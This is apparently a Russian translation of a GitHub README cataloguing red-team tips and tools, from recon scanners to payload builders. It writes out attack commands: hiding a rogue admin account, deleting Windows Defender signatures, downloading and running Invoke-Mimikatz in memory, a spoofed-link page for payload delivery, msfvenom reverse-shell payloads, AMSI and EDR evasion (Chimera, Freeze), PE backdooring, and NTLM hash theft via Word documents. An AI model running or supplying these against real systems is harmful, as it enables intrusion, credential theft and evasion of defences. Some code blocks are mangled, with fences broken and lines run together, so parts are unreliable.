
Инструменты и методы для Red Team / Penetration Testing
Этот репозиторий GitHub содержит коллекцию из 150+ инструментов и ресурсов, которые могут быть полезны для действий red team.
Некоторые инструменты могут быть специально разработаны для red teaming, другие же являются более универсальными и могут быть адаптированы для использования в контексте red team.
🔗 Если вы специалист Blue Team, ознакомьтесь с BlueTeam-Tools
Warning
Материалы в этом репозитории предназначены только для информационных и образовательных целей. Они не предназначены для использования в любых незаконных действиях.
Note
Скрывайте заголовки списков инструментов с помощью стрелки.
Нажмите 🔙, чтобы вернуться к списку.
Учитесь у Red Teamers с помощью коллекции советов по Red Teaming. Эти советы охватывают ряд тактик, инструментов и методологий для улучшения ваших навыков red teaming.
Описание: 'Qakbot добавил EventListener для движения мыши к вложению с HTML-смаглингом для защиты от песочниц — ZIP-файл не будет сброшен.'
Автор: @pr0xylife
Ссылка: Twitter
Автор: @malmoeb
Ссылка: Twitter
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v alh4zr3d /d 0 /f
**Описание:** *'Создание учетных записей рискованно при уклонении от синих, но при создании локального администратора используйте небольшую хитрость в реестре, чтобы скрыть его.'*
**Автор:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**Ссылка:** [Twitter](https://twitter.com/Alh4zr3d/status/1612913838999113728)
### [🔙](#tool-list)Отключение защитника Windows путем удаления сигнатур```bash
"%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Описание: Немного грязно, но если Защитник Windows доставляет вам большие неприятности, вместо того чтобы отключать его (что предупреждает пользователя), лучше просто обезвредить его, удалив все сигнатуры.
Автор: @Alh4zr3d
Ссылка: Twitter
reg add HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0 /f
**Описание:** *'Иногда вы хотите войти на хост через RDP или аналогичный протокол, но у вашего пользователя есть активная сессия. Включите несколько сессий для одного пользователя.'*
**Автор:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**Ссылка:** [Twitter](https://twitter.com/Alh4zr3d/status/1609954528425558016)
### [🔙](#tool-list)Sysinternals PsExec.exe локальная альтернатива```bash
wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c " command "
Описание: 'Устали загружать Sysinternals PsExec.exe при боковом перемещении? В Windows есть лучшая альтернатива, установленная по умолчанию. Попробуйте это вместо этого.'
Автор: @GuhnooPlusLinux
Ссылка: Twitter
0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(<tgt_ip>,$)) "Port $ open"} 2>$null
**Описание:** *'По возможности используйте имеющиеся средства, а не загружайте инструменты на машины (по многим причинам). Помощь от PowerShell/.NET. Пример: простой сканер портов на PowerShell.'*
**Автор:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**Ссылка:** [Twitter](https://twitter.com/Alh4zr3d/status/1605060950339588096)
### [🔙](#tool-list)Proxy aware PowerShell DownloadString```bash
$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("<url>")
Описание: 'Большинство крупных организаций в наши дни используют веб-прокси. Стандартный даунлоад-код PowerShell не работает с прокси. Используйте этот.'
Автор: @Alh4zr3d
Ссылка: Twitter
type "C:\Users%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"
**Описание:** *«Вы удивитесь, что можно узнать только из закладок пользователя. Например, внутренние конечные точки, к которым у них есть доступ».*
**Автор:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**Ссылка:** [Twitter](https://twitter.com/Alh4zr3d/status/1595488676389171200)
### [🔙](#tool-list)Запрос DNS-записей для перечисления```bash
Get-DnsRecord -RecordType A -ZoneName FQDN -Server <server hostname>
Описание: 'Разведка — это 95% игры. Однако запуск тонны сканирований для оценки среды — это очень шумно. Зачем просто не спросить DC/DNS-сервер о всех DNS-записях?'
Автор: @Alh4zr3d
Ссылка: Twitter
Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$.StartMode -eq "Auto" -and $.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
**Описание:** *'Поиск путей служб без кавычек без PowerUp'*
**Автор:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**Ссылка:** [Twitter](https://twitter.com/Alh4zr3d/status/1579254955554136064)
### [🔙](#tool-list)Обход отключенной командной строки с помощью /k```bash
# Win+R (To bring up Run Box)
cmd.exe /k "whoami"
Описание: 'Эта командная строка была отключена вашим администратором...' Обычно можно увидеть в таких средах, как компьютеры-киоски. Быстрый хакерский обходной путь — использовать /k через окно «Выполнить» в Windows. Это выполнит команду, а затем покажет сообщение об ограничении, позволяя выполнять команды.
Автор: Мартин Зон Кристенсен
Ссылка: Блог
(new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv
**Описание:** *'Надоело, что Защитник Windows удаляет mimikatz.exe? Попробуйте это вместо этого.'*
**Автор:** [@GuhnooPlusLinux](https://twitter.com/GuhnooPlusLinux)
**Ссылка:** [Twitter](https://twitter.com/GuhnooPlusLinux/status/1605629049660809216)
### [🔙](#tool-list)Проверьте, находитесь ли вы в виртуальной машине```bash
reg query HKLM\SYSTEM /s | findstr /S "VirtualBox VBOX VMWare"
Описание: 'Хотите узнать, находитесь ли вы в виртуальной машине? Запросите ключи реестра и узнайте!!! Если появятся какие-либо результаты, значит, вы находитесь в виртуальной машине.'
Автор: @dmcxblue
Ссылка: Twitter
(Get-AppLockerPolicy -Local).RuleCollections
Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\
**Описание:** *'AppLocker может быть головной болью. Просканируйте, чтобы понять, насколько это больно'*
**Автор:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**Ссылка:** [Twitter](https://twitter.com/alh4zr3d/status/1614706476412698624)
### [🔙](#tool-list)Ярлык CMD через 6 пикселей в mspaint

1. Откройте MSPaint.exe и установите размер холста: Ширина=6, Высота=1 пиксель
2. Увеличьте масштаб, чтобы упростить следующие шаги
3. С помощью палитры установите значения пикселей (слева направо):
- 1-й: R: 10, G: 0, B: 0
- 2-й: R: 13, G: 10, B: 13
- 3-й: R: 100, G: 109, B: 99
- 4-й: R: 120, G: 101, B: 46
- 5-й: R: 0, G: 0, B: 101
- 6-й: R: 0, G: 0, B: 0
4. Сохраните как 24-битный Bitmap (*.bmp;*.dib)
5. Измените расширение с bmp на bat и запустите.
**Описание:** *'Необычный, но эффективный метод получения оболочки путем создания ярлыка для cmd.exe с помощью рисования определенных цветов в Microsoft Paint. Благодаря алгоритму кодирования, используемому для записи BMP-файлов, можно управлять ASCII-данными, записанными в файл, тщательно подбирая определенные цвета RGB.'*
**Автор:** [PenTestPartners](https://www.pentestpartners.com/)
**Ссылка:** [Блог](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/#gainingacommandshell)
### [🔙](#tool-list)Спуфинг ссылок с помощью метода JavaScript PreventDefault
```html
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>PreventDefault Example</title>
</head>
<body>
<a href="https://google.com" onclick="event.preventDefault(); window.location.href = 'https://bing.com';">Go to Google</a>
</body>
</html>
Описание: Злоумышленники используют эту технику, чтобы обманом заставить жертву кликнуть на поддельные ссылки для загрузки вредоносного ПО на странице. С помощью метода JavaScript PreventDefault можно подменить ссылку при наведении, отображая легитимную ссылку google.com, но при клике жертва будет перенаправлена на вашу вредоносную ссылку bing.com. Отлично подходит для того, чтобы заставить жертв загружать полезные нагрузки через контролируемый сайт.
Ссылка: Документация PreventDefault
```powershell
Copy-Item -Path "C:\tmp" -Destination "\<ip_running_responder>\c$"
**Описание:** *«Когда я провожу оценку компрометации, я часто спрашиваю заказчика, можно ли сделать последнюю быструю проверку: `Copy-Item -Path "C:\tmp\" -Destination "\\<ip_running_responder>\c$"`. Если Responder сможет захватить хеш, значит, брандмауэр разрешает исходящие SMB-соединения»*
**Автор:** [@malmoeb](https://twitter.com/malmoeb)
**Ссылка:** [Twitter](https://twitter.com/malmoeb/status/1628272928855826433)
### [🔙](#tool-list)Отключение антивируса с помощью SysInternals PsSuspend

**Описание:** *С помощью утилиты Microsoft Sysinternals PsSuspend.exe можно приостановить работу некоторых исполняемых файлов антивирусных служб. В подписанную Microsoft утилиту можно передать PID или имя запущенной службы, и она приостановит процесс через Windows API NtSuspendProcess.*
**Статья по теме:** [Обход антивируса через приостановку процесса с помощью PsSuspend.exe](https://medium.com/@a-poc/process-suspension-with-pssuspend-exe-0cdf5d16a3b7)
**Ссылка:** [Twitter](https://twitter.com/0gtweet/status/1638069413717975046)
Разведка
====================
### [🔙](#tool-list)[spiderfoot](https://github.com/smicallef/spiderfoot)
SpiderFoot — это инструмент автоматизации разведки по открытым источникам (OSINT). Он интегрируется практически со всеми доступными источниками данных и использует множество методов анализа, делая эти данные легко доступными для навигации.
SpiderFoot может использоваться как в наступательных целях (например, в рамках упражнений красной команды или тестирования на проникновение) для разведки цели, так и в оборонительных — для сбора информации о том, что вы или ваша компания могли случайно раскрыть в Интернете.
**Установка:**```bash
wget https://github.com/smicallef/spiderfoot/archive/v4.0.tar.gz
tar zxvf v4.0.tar.gz
cd spiderfoot-4.0
pip3 install -r requirements.txt
Полные инструкции по установке смотрите здесь.
Использование:```python python3 ./sf.py -l 127.0.0.1:5001
Множество обучающих видео по использованию [здесь](https://asciinema.org/~spiderfoot)

*Изображение взято с https://github.com/smicallef/spiderfoot*
### [🔙](#tool-list)[reconftw](https://github.com/six2dez/reconftw)
reconFTW автоматизирует весь процесс разведки за вас. Он превосходит работу по перечислению поддоменов вместе с различными проверками уязвимостей и получением максимальной информации о вашей цели.
**Установка:**```bash
git clone https://github.com/six2dez/reconftw.git;cd reconftw/;./install.sh
Для полных инструкций по установке смотрите здесь.
Использование:```bash
./reconftw.sh -d target.com -r
./reconftw.sh -m target -l domains.txt -r
./reconftw.sh -d target.com -p
./reconftw.sh -d target.com -a
Полные инструкции по использованию см. [здесь](https://github.com/six2dez/reconftw/wiki/2.-Usage-Guide).

*Изображение взято с https://www.youtube.com/watch?v=TQmDAtkD1Wo*
### [🔙](#tool-list)[subzy](https://github.com/PentestPad/subzy)
Инструмент для захвата поддоменов, работающий на основе сопоставления ответных отпечатков из [can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz/blob/master/README.md).
**Установка:**```bash
go install -v github.com/PentestPad/subzy@latest
Полные инструкции по установке см. здесь.
Использование:```bash
./subzy run --targets list.txt
./subzy run --target test.google.com ./subzy run --target test.google.com,https://test.yahoo.com

*Изображение взято с https://www.geeksforgeeks.org/subzy-subdomain-takeover-vulnerability-checker-tool/*
### [🔙](#tool-list)[smtp-user-enum](https://github.com/cytopia/smtp-user-enum)
Перечисление пользователей SMTP через VRFY, EXPN и RCPT с умной функцией таймаута, повторных попыток и переподключения.
**Установка:**```bash
pip install smtp-user-enum
Использование:```bash smtp-user-enum [options] -u/-U host port smtp-user-enum --help smtp-user-enum --version

*Изображение взято с https://www.kali.org/tools/smtp-user-enum/*
### [🔙](#tool-list)crt.sh -> httprobe -> EyeWitness
Я собрал однострочный bash-скрипт, который:
- Пассивно собирает список поддоменов из сертификационных ассоциаций ([crt.sh](https://crt.sh/))
- Активно проверяет каждый поддомен на существование ([httprobe](https://github.com/tomnomnom/httprobe))
- Делает активные скриншоты каждого поддомена для ручного анализа ([EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness))
**Использование:**```bash
domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web
Примечание: У вас должны быть установлены httprobe, pup и EyeWitness, и измените 'DOMAIN_COM' на целевой домен. Вы можете запускать этот скрипт одновременно в окнах терминала, если у вас несколько корневых доменов цели.


JavaScript-букмарклет для извлечения всех ссылок на конечные точки веб-страницы.
Создан @renniepak, этот фрагмент JavaScript-кода можно использовать для извлечения всех конечных точек (начинающихся с /) из DOM текущей веб-страницы, включая все внешние источники скриптов, встроенные на веб-странице.```javascript
javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=("|'|`))/[a-zA-Z0-9_?&=/-#.]*(?=("|'|`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"
")})}setTimeout(writeResults,3e3);})();
**Использование (букмарклет)**
Создайте букмарклет...
- `Щёлкните правой кнопкой по панели закладок`
- `Нажмите 'Добавить страницу'`
- `Вставьте вышеуказанный JavaScript в поле 'url'`
- `Нажмите 'Сохранить'`
...Затем перейдите на страницу жертвы в браузере и нажмите на букмарклет.

**Использование (консоль)**
Вставьте вышеуказанный JavaScript в окно консоли `F12` и нажмите Enter.

### [🔙](#tool-list)[nuclei](https://github.com/projectdiscovery/nuclei)
Быстрый сканер уязвимостей, использующий шаблоны .yaml для поиска конкретных проблем.
**Установка:**```bash
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
Использование:```bash cat domains.txt | nuclei -t /PATH/nuclei-templates/

### [🔙](#tool-list)[certSniff](https://github.com/A-poc/certSniff)
certSniff — это монитор ключевых слов журналов Certificate Transparency, написанный мной на Python. Он использует библиотеку certstream для отслеживания журналов создания сертификатов, содержащих ключевые слова, определённые в файле.
Вы можете запустить его с несколькими ключевыми словами, относящимися к вашему целевому домену; любые созданные сертификаты будут записаны и могут привести к обнаружению доменов, о которых вы ранее не знали.
**Установка:**```bash
git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt
Использование:```python python3 certSniff.py -f example.txt

### [🔙](#tool-list)[gobuster](https://www.kali.org/tools/gobuster/)
Отличный инструмент для перебора путей к файлам/папкам на сайте жертвы.
**Установка:**```bash
sudo apt install gobuster
Использование:```bash gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20

### [🔙](#tool-list)[feroxbuster](https://github.com/epi052/feroxbuster)
Инструмент, предназначенный для выполнения принудительного просмотра (Forced Browsing) — атаки, целью которой является перечисление и доступ к ресурсам, на которые нет ссылок в веб-приложении, но которые всё ещё доступны злоумышленнику.
Feroxbuster использует перебор вместе со списком слов для поиска несвязанного контента в целевых каталогах. Эти ресурсы могут хранить конфиденциальную информацию о веб-приложениях и операционных системах, такую как исходный код, учетные данные, внутренние сетевые адреса и т.д.
**Установка: (Kali)**```bash
sudo apt update && sudo apt install -y feroxbuster
Установка: (Mac)```bash curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash
**Установка: (Windows)**```bash
Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip
Expand-Archive .\feroxbuster.zip
.\feroxbuster\feroxbuster.exe -V
Полные инструкции по установке см. здесь.
Использование:```bash
./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx
./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}"
cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files
./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080
Полные примеры использования можно найти [здесь](https://epi052.github.io/feroxbuster-docs/docs/examples/).

*Изображение взято с https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif*
### [🔙](#tool-list)[CloudBrute](https://github.com/0xsha/CloudBrute)
Инструмент для поиска инфраструктуры, файлов и приложений компании (цели) в ведущих облачных провайдерах (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode).
Особенности:
- Обнаружение облака (IPINFO API и исходный код)
- Быстрый (параллельный)
- Кроссплатформенный (Windows, Linux, Mac)
- Рандомизация User-Agent
- Рандомизация прокси (HTTP, Socks5)
**Установка:**
Загрузите последний [релиз](https://github.com/0xsha/CloudBrute/releases) для вашей системы и следуйте инструкциям по использованию.
**Использование:**```bash
# Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'
CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"
# Output results to file
CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt

Изображение использовано с https://github.com/0xsha/CloudBrute
dnsrecon — это инструмент на pyhton для перечисления DNS-записей (MX, SOA, NS, A, AAAA, SPF и TXT) и может предоставить ряд новых связанных хост-жертв для перехода с одного поиска домена.
Установка:```bash sudo apt install dnsrecon
**Использование:**```bash
dnsrecon -d google.com

Shodan сканирует публичную инфраструктуру и отображает её в поисковом формате. Используя название компании, доменное имя или IP-адрес, можно обнаружить потенциально уязвимые системы, относящиеся к вашей цели, через shodan.

Инструмент для перечисления поддоменов, перечисления DNS, обнаружения WAF, WHOIS, сканирования портов, wayback machine, сбора электронной почты.
Установка:```bash git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt
**Использование:**```python
python3 AORT.py -d google.com

Программа, которая проверяет, можно ли подделать домен с помощью спама. Программа проверяет записи SPF и DMARC на наличие слабых конфигураций, допускающих подделку. Кроме того, она предупредит, если у домена есть конфигурация DMARC, которая отправляет почту или HTTP-запросы при неудачных SPF/DKIM письмах.
Домены считаются подделываемыми, если выполняется любое из следующих условий:
~all или -allp=none или отсутствуетУстановка:```bash git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt
**Использование:**```bash
./spoofcheck.py [DOMAIN]

AWSBucketDump — это инструмент для быстрого перечисления S3-корзин AWS в поисках интересных файлов. Он похож на брутфорс поддоменов, но создан специально для S3-корзин и имеет дополнительные возможности, позволяющие выполнять поиск по файлам (grep) и скачивать интересующие файлы.
Установка:``` git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt
**Использование:**```
usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]
optional arguments:
-h, --help show this help message and exit
-D Download files. This requires significant diskspace
-d If set to 1 or True, create directories for each host w/ results
-t THREADS number of threads
-l HOSTLIST
-g GREPWORDS Provide a wordlist to grep for
-m MAXSIZE Maximum file size to download.
python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1
Отличный инструмент для поиска информации на GitHub с помощью регулярных выражений, с возможностью поиска по конкретным пользователям и/или проектам GitHub.
Установка:``` git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester
**Использование:**```
./githarvester.py
TruffleHog — это инструмент, который сканирует git-репозитории и ищет строки с высокой энтропией и шаблоны, которые могут указывать на наличие секретов, таких как пароли и ключи API. С помощью TruffleHog вы можете быстро и легко находить конфиденциальную информацию, которая могла быть случайно зафиксирована и отправлена в репозиторий.
Установка (бинарные файлы): Ссылка
Установка (Go):``` git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install
**Использование:**```
trufflehog https://github.com/trufflesecurity/test_keys

Dismap — это инструмент для обнаружения и идентификации активов. Он может быстро определять протоколы и fingerprint-информацию, такие как web/tcp/udp, находить типы активов и подходит для внутренних и внешних сетей.
Dismap имеет полную базу fingerprint-правил, включающую на данный момент протокольные fingerprint'ы tcp/udp/tls и более 4500 веб-правил fingerprint, которые могут идентифицировать favicon, body, header и т.д.
Установка:
Dismap — это бинарный файл для Linux, MacOS и Windows. Перейдите на Release, чтобы загрузить соответствующую версию для запуска:```bash
chmod +x dismap-0.3-linux-amd64 ./dismap-0.3-linux-amd64 -h
dismap-0.3-windows-amd64.exe -h
**Использование:**```bash
# Scan 192.168.1.1 subnet
./dismap -i 192.168.1.1/24
# Scan, output to result.txt and json output to result.json
./dismap -i 192.168.1.1/24 -o result.txt -j result.json
# Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds
./dismap -i 192.168.1.1/24 --np --timeout 10
# Scan, Number of concurrent threads 1000
./dismap -i 192.168.1.1/24 -t 1000

Изображение взято с https://github.com/zhzyker/dismap
Инструмент для сбора информации о системах Windows и Samba.
Может использоваться для получения широкого спектра информации, включая:
Установка: (Apt)```bash sudo apt install enum4linux
**Установка: (Git)**```bash
git clone https://github.com/CiscoCXSecurity/enum4linux
cd enum4linux
Использование:```bash
enum4linux.pl -a 192.168.2.55
enum4linux.pl -U 192.168.2.55
enum4linux.pl -u administrator -p password -U 192.168.2.55
enum4linux.pl -G 192.168.2.55
enum4linux.pl -v 192.168.2.55
Полную информацию об использовании можно найти в этом [блоге](https://labs.portcullis.co.uk/tools/enum4linux/).

*Изображение взято из https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/*
### [🔙](#tool-list)[skanuvaty](https://github.com/Esc4iCEscEsc/skanuvaty)
Чрезвычайно быстрый сканер DNS/сети/портов, созданный [Esc4iCEscEsc](https://github.com/Esc4iCEscEsc), написан на rust.
Вам понадобится файл с поддоменами. *Например, [список поддоменов от Sublist3r](https://raw.githubusercontent.com/aboul3la/Sublist3r/master/subbrute/names.txt)*.
**Установка:**
Загрузите последний релиз [отсюда](https://github.com/Esc4iCEscEsc/skanuvaty/releases).```bash
# Install a wordlist
sudo apt install wordlists
ls /usr/share/dirb/wordlists
ls /usr/share/amass/wordlists
Использование:```bash skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt

*Изображение используется из https://github.com/Esc4iCEscEsc/skanuvaty*
### [🔙](#tool-list)[Metabigor](https://github.com/j3ssie/metabigor)
Metabigor — это инструмент разведки, его цель — выполнять задачи OSINT и не только, но без какого-либо API-ключа.
**Основные функции:**
- Поиск информации об IP-адресе, ASN и организации.
- Обёртка для более эффективного запуска rustscan, masscan и nmap на IP/CIDR.
- Поиск дополнительных связанных доменов цели с помощью различных методов (сертификат, whois, Google Analytics и т.д.).
- Получить сводку об IP-адресе (работает на базе [@thebl4ckturtle](https://github.com/theblackturtle))
**Установка:**```bash
go install github.com/j3ssie/metabigor@latest
Использование:```bash
echo "company" | metabigor net --org -o /tmp/result.txt
echo 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command
echo '1.2.3.4/24' | metabigor scan -o result.txt
echo 'example.com' | metabigor related -s 'whois'
echo 'https://example.com' | metabigor related -s 'google-analytic'

*Изображение взято из https://github.com/j3ssie/metabigor*
### [🔙](#tool-list)[Gitrob](https://github.com/michenriksen/gitrob)
Gitrob — это инструмент, помогающий находить потенциально конфиденциальные файлы, загруженные в публичные репозитории на Github.
Gitrob клонирует репозитории, принадлежащие пользователю или организации, на заданную глубину, просматривает историю коммитов и отмечает файлы, соответствующие сигнатурам потенциально конфиденциальных файлов.
Результаты будут представлены через веб-интерфейс для удобного просмотра и анализа.
**Примечание:** *Gitrob потребуется токен доступа Github для взаимодействия с API Github. [Создайте персональный токен доступа](https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/) и сохраните его в переменной окружения в вашем .bashrc или аналогичном файле конфигурации оболочки:*```bash
export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
Установка: (Go)```bash go get github.com/michenriksen/gitrob
**Установка: (Binary)**
A [предварительно скомпилированная версия](https://github.com/michenriksen/gitrob/releases) доступна для каждого релиза.
**Использование:**```bash
# Run against org
gitrob {org_name}
# Saving session to a file
gitrob -save ~/gitrob-session.json acmecorp
# Loading session from a file
gitrob -load ~/gitrob-session.json

Изображение взято с https://www.uedbox.com/post/58828/
Gowitness — это утилита для создания скриншотов веб-сайтов, написанная на Golang, которая использует Chrome Headless для генерации снимков веб-интерфейсов из командной строки, а также включает удобный просмотрщик отчетов для обработки результатов. Поддерживаются как Linux, так и macOS, поддержка Windows в основном работает.
Установка: (Go)```bash go install github.com/sensepost/gowitness@latest
Полная информация по установке доступна [здесь](https://github.com/sensepost/gowitness/wiki/Installation).
**Использование:**```bash
# Screenshot a single website
gowitness single https://www.google.com/
# Screenshot a cidr using 20 threads
gowitness scan --cidr 192.168.0.0/24 --threads 20
# Screenshot open http services from an namp file
gowitness nmap -f nmap.xml --open --service-contains http
# Run the report server
gowitness report serve
Full usage information can be found here.

Изображение взято из https://github.com/sensepost/gowitness
Внедряет ссылку на удаленный шаблон Word в документ Word.
Эта утилита на Python изменяет ссылку settings.xml.rels в файле .docx на удаленный .dotm-шаблон, содержащий VBA-макрос, который выполняется при открытии документа и включенных макросах.
Установка:```bash git clone https://github.com/JohnWoodman/remoteinjector;cd remoteinjector
**Использование:**```bash
python3 remoteinjector.py -w https://example.com/template.dotm example.docx
Chimera — это скрипт обфускации PowerShell, предназначенный для обхода AMSI и антивирусных решений. Он обрабатывает вредоносные PS1-файлы, известные тем, что вызывают срабатывание AV, и использует подстановку строк и конкатенацию переменных для обхода распространенных сигнатур обнаружения.
Установка:```bash sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git sudo git clone https://github.com/tokyoneon/chimera /opt/chimera sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/ sudo chmod +x chimera.sh; ./chimera.sh --help
**Использование:**```bash
./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
invoke-expression,out-string,write-error -j -g -k -r -p

Msfvenom позволяет создавать полезные нагрузки для различных операционных систем в широком спектре форматов. Также поддерживает обфускацию полезных нагрузок для обхода антивирусов.
Настройка слушателя```shell use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your-ip set LPORT listening-port run
#### Команды Msfvenom
**PHP:**```bash
msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R
Windows:```bash msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe
**Linux:**```bash
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
Java:```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
**HTA:**```bash
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta

Shellter — это динамический инструмент для внедрения шелл-кода и первый по-настоящему динамический инжектор PE-файлов.
Он может использоваться для внедрения шелл-кода в нативные приложения Windows (в настоящее время только 32-битные приложения).
Shellter использует исходную структуру PE-файла и не применяет никаких модификаций, таких как изменение разрешений доступа к памяти в секциях (если этого не хочет пользователь), добавление дополнительной секции с доступом RWE и всего, что могло бы выглядеть подозрительно при сканировании антивирусом.
Полную информацию о README можно найти здесь.
Установка: (Kali)```bash apt-get update apt-get install shellter
**Установка: (Windows)**
Посетите [страницу загрузки](https://www.shellterproject.com/download/) и установите.
**Использование:**
Просто выберите легитимный бинарный файл для бэкдора и запустите Shellter.
Некоторые полезные советы можно найти [здесь](https://www.shellterproject.com/tipstricks/).
Множество демонстраций использования сообществом можно найти [здесь](https://www.shellterproject.com/shellter-community-demos/).

*Изображение взято с https://www.kali.org/tools/shellter/images/shellter.png*
### [🔙](#tool-list)[Freeze](https://github.com/optiv/Freeze)
Freeze — это инструмент для создания полезной нагрузки, используемый для обхода средств безопасности EDR с целью незаметного выполнения шелл-кода.
Freeze использует несколько методов, чтобы не только удалять хуки EDR в пользовательском пространстве, но и выполнять шелл-код таким образом, чтобы обходить другие средства мониторинга конечных точек.
**Установка:**```bash
git clone https://github.com/optiv/Freeze
cd Freeze
go build Freeze.go
Использование:``` -I string Path to the raw 64-bit shellcode. -O string Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe. -console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature. -encrypt Encrypts the shellcode using AES 256 encryption -export string For DLL Loaders Only - Specify a specific Export function for a loader to have. -process string The name of process to spawn. This process has to exist in C:\Windows\System32. Example 'notepad.exe' (default "notepad.exe") -sandbox Enables sandbox evasion by checking: Is Endpoint joined to a domain? Does the Endpoint have more than 2 CPUs? Does the Endpoint have more than 4 gigs of RAM? -sha256 Provides the SHA256 value of the loaders (This is useful for tracking)

*Изображение используется с https://www.blackhatethicalhacking.com/tools/freeze/*
### [🔙](#tool-list)[WordSteal](https://github.com/0x09AL/WordSteal)
Этот скрипт создаст документ Microsoft Word с удаленным изображением, что позволяет перехватывать NTML-хеши с удаленной конечной точки жертвы.
Microsoft Word позволяет включать изображения из удаленных мест, включая удаленное изображение, размещенное на SMB-сервере, контролируемом атакующим. Это дает вам возможность прослушивать и перехватывать NTLM-хеши, которые отправляются, когда аутентифицированная жертва открывает документ Word и отображает изображение.
**Установка:**```
git clone https://github.com/0x09AL/WordSteal
cd WordSteal
Использование:```bash
./main.py 127.0.0.1 test.jpg 1
./main.py 127.0.0.1 test.jpg 0\n

*Изображение взято с https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/*
### [🔙](#tool-list)[NTAPI Undocumented Functions](http://undocumented.ntinternals.net/)
